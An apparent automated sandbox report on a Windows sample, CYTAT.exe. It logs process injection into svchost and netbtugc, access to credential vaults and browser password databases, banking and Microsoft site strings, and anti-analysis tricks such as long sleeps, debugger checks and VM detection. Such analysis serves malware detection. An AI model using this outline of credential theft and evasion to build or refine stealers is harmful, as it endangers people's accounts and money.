            Source: C:\Users\user\Desktop\CYTAT.exe File created: C:\Users\user~1\AppData\Local\Temp\Ramada
            Source: CYTAT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CYTAT.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\CYTAT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1806654781.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3101363339.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1804430151.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3101363339.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CYTAT.exe ReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\CYTAT.exe File read: C:\Users\user\Desktop\CYTAT.exe
            Source: unknown Process created: C:\Users\user\Desktop\CYTAT.exe "C:\Users\user\Desktop\CYTAT.exe"
            Source: C:\Users\user\Desktop\CYTAT.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CYTAT.exe"
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\CYTAT.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CYTAT.exeStatic file information: File size 1357205 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eMNaOgRkIZi.exe, 0000000A.00000002.3104267331.00000000009FE000.00000002.00000001.01000000.00000005.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543340144.00000000009FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: CYTAT.exeStatic PE information: real checksum: 0xa961f should be: 0x14e3fb
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00403060 push eax; ret 4_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004160FC push 00000030h; retf 4_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041789B push C5503231h; retf 4_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041613C push 00000030h; retf 4_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040D211 pushad ; ret 4_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004132A3 push esi; ret 4_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041136F push edi; retf 4_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417CFB push 789F05E2h; iretd 4_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004135D8 push ds; retf 4_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004135E3 push ds; retf 4_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00414594 push edi; retf 4_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041E67B push ebp; retf 4_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041E61E push eax; retf 4_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0041E6DA pushad ; ret 4_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004016F6 push ss; ret 4_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417FCB push edx; iretd 4_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00401FF6 push ecx; ret 4_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035309AD push ecx; mov dword ptr [esp], ecx4_2_035309B6
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F430A push edi; retf 10_2_033F430D
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F623E push esi; ret 10_2_033F6243
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F01AC pushad ; ret 10_2_033F01AD
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033FA836 push C5503231h; retf 10_2_033FA83E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F9097 push 00000030h; retf 10_2_033F90E4
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F90D7 push 00000030h; retf 10_2_033F90E4
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033FAF66 push edx; iretd 10_2_033FAF68
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_03401675 pushad ; ret 10_2_03401676
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_03401616 push ebp; retf 10_2_03401618
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F752F push edi; retf 10_2_033F7552
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F657E push ds; retf 10_2_033F658B
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F6573 push ds; retf 10_2_033F658B
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\CYTAT.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\CYTAT.exeAPI/Special instruction interceptor: Address: 3FC2374
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E rdtsc 4_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 4628
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 5345
            Source: C:\Users\user\Desktop\CYTAT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87584
            Source: C:\Users\user\Desktop\CYTAT.exeAPI coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep count: 4628 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep time: -9256000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep count: 5345 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 7564Thread sleep time: -10690000s >= -30000s
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe TID: 7592Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe TID: 7592Thread sleep time: -37500s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A1C2C0 FindFirstFileW,FindNextFileW,FindClose,12_2_00A1C2C0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,116U
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Mozilla Firefox\Firefox.exeVMware[
            Source: 01194HH4.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 01194HH4.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 01194HH4.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696492231^
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware[
            Source: 01194HH4.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 01194HH4.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 01194HH4.12.drBinary or memory string: discord.comVMware20,11696492231f
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.1914781847.000001E2654FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: netbtugc.exe, 0000000C.00000002.3109478398.0000000007C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20G
            Source: 01194HH4.12.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 01194HH4.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 01194HH4.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: CYTAT.exe, 00000000.00000002.1272397417.0000000000AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: 01194HH4.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 01194HH4.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: eMNaOgRkIZi.exe, 0000000D.00000002.3105721712.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: 01194HH4.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: 01194HH4.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: 01194HH4.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 01194HH4.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 01194HH4.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 01194HH4.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 01194HH4.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Users\user\Desktop\CYTAT.exeAPI call chain: ExitProcess graph end nodegraph_0-86709
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E rdtsc 4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004172B3 LdrLoadDll,4_2_004172B3
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC2640 mov eax, dword ptr fs:[00000030h]0_2_03FC2640
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC25E0 mov eax, dword ptr fs:[00000030h]0_2_03FC25E0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC0FB0 mov eax, dword ptr fs:[00000030h]0_2_03FC0FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov ecx, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B035C mov eax, dword ptr fs:[00000030h]4_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA352 mov eax, dword ptr fs:[00000030h]4_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D8350 mov ecx, dword ptr fs:[00000030h]4_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B2349 mov eax, dword ptr fs:[00000030h]4_2_035B2349
